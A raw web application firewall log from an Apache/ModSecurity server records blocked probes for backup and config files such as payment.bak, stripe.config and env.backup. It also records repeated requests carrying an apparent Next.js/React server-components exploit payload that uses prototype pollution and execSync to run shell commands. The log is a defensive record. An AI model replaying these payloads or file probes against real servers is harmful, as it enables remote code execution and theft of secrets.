[:error] [pid 12588:tid 12657] [client 54.206.82.241:41478] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/backup/payment.bak"] [unique_id "acXUlJ-_AO9Vzpmoz0OshwAAAJA"] [Fri Mar 27 02:52:00.312524 2026] [:error] [pid 14876:tid 14919] [client 54.206.82.241:45114] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/tmp/stripe.config"] [unique_id "acXUsIkvinLXBnMOctw_eQAAAUs"] [Fri Mar 27 02:53:04.031334 2026] [:error] [pid 14876:tid 14910] [client 54.206.82.241:53546] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/php.ini"] [unique_id "acXU8IkvinLXBnMOctxBEgAAAUI"] [Fri Mar 27 02:56:38.957490 2026] [:error] [pid 9794:tid 9816] [client 54.206.82.241:47958] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/properties.ini"] [unique_id "acXVxlUvoxVxnUPz0PCYhAAAAYw"] [Fri Mar 27 02:57:04.705249 2026] [:error] [pid 9794:tid 9812] [client 54.206.82.241:51204] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/env.backup"] [unique_id "acXV4FUvoxVxnUPz0PCZTQAAAYg"] [Fri Mar 27 08:24:15.348668 2026] [:error] [pid 887:tid 909] [client 52.12.174.228:40224] [client 52.12.174.228] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "acYijztAQdAOanisCi9bRAAAANQ"] [Fri Mar 27 08:24:15.518999 2026] [:error] [pid 887:tid 899] [client 52.12.174.228:40224] [client 52.12.174.228] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "acYijztAQdAOanisCi9bRQAAAMo"] [Fri Mar 27 08:24:15.696274 2026] [:error] [pid 887:tid 894] [client 52.12.174.228:40224] [client 52.12.174.228] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "acYijztAQdAOanisCi9bRgAAAMU"] [Fri Mar 27 08:25:49.647510 2026] [:error] [pid 635:tid 790] [client 13.61.11.9:52486] [client 13.61.11.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "acYi7eNkpep9WB2LEqe5gQAAAI8"] [Fri Mar 27 08:25:49.680507 2026] [:error] [pid 635:tid 806] [client 13.61.11.9:52486] [client 13.61.11.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "acYi7eNkpep9WB2LEqe5ggAAAJg"] [Fri Mar 27 08:25:49.721267 2026] [:error] [pid 635:tid 771] [client 13.61.11.9:52486] [client 13.61.11.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "acYi7eNkpep9WB2LEqe5gwAAAIQ"] [Fri Mar 27 08:37:59.049581 2026] [:error] [pid 16029:tid 16286] [client 16.171.14.100:58730] [client 16.171.14.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.web.dev-unit.com"] [uri "/en"] [unique_id "acYlx1GMC1fM57wz1nCJ3gAAARM"] [Fri Mar 27 08:37:59.082641 2026] [:error] [pid 16029:tid 16283] [client 16.171.14.100:58730] [client 16.171.14.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.web.dev-unit.com"] [uri "/en"] [unique_id "acYlx1GMC1fM57wz1nCJ3wAAARE"] [Fri Mar 27 08:37:59.122871 2026] [:error] [pid 16029:tid 16253] [client 16.171.14.100:58730] [client 16.171.14.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.web.dev-unit.com"] [uri "/en"] [unique_id "acYlx1GMC1fM57wz1nCJ4QAAAQI"] [Fri Mar 27 08:41:36.574920 2026] [:error] [pid 633:tid 744] [client 65.0.6.135:43522] [client 65.0.6.135] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.web.dev-unit.com"] [uri "/en"] [unique_id "acYmoH2IMBMCzpL_xnLkXAAAABI"] [Fri Mar 27 08:41:36.711819 2026] [:error] [pid 633:tid 733] [client 65.0.6.135:43522] [client 65.0.6.135] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.web.dev-unit.com"] [uri "/en"] [unique_id "acYmoH2IMBMCzpL_xnLkXQAAAA0"] [Fri Mar 27 08:41:36.856251 2026] [:error] [pid 633:tid 721] [client 65.0.6.135:43522] [client 65.0.6.135] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.web.dev-unit.com"] [uri "/en"] [unique_id "acYmoH2IMBMCzpL_xnLkXgAAAAM"] [Sat Mar 28 05:12:45.816362 2026] [:error] [pid 30350:tid 30419] [client 216.73.216.27:7154] [client 216.73.216.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^$" at REQUEST_HEADERS:user-agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "68"] [id "960006"] [rev "1"] [msg "Empty User Agent Header"] [severity "NOTICE"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_UA"] [hostname "www.web.dev-unit.com"] [uri "/robots.txt"] [unique_id "acdHLdtEEobSu_CFvZMyFQAAAII"] [Sun Mar 29 10:23:48.041171 2026] [:error] [pid 22954:tid 22974] [client 216.73.216.143:64610] [client 216.73.216.143] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^$" at REQUEST_HEADERS:user-agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "68"] [id "960006"] [rev "1"] [msg "Empty User Agent Header"] [severity "NOTICE"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_UA"] [hostname "web.dev-unit.com"] [uri "/robots.txt"] [unique_id "acjhlKyJ3ITYRRc19Cs5WQAAANI"]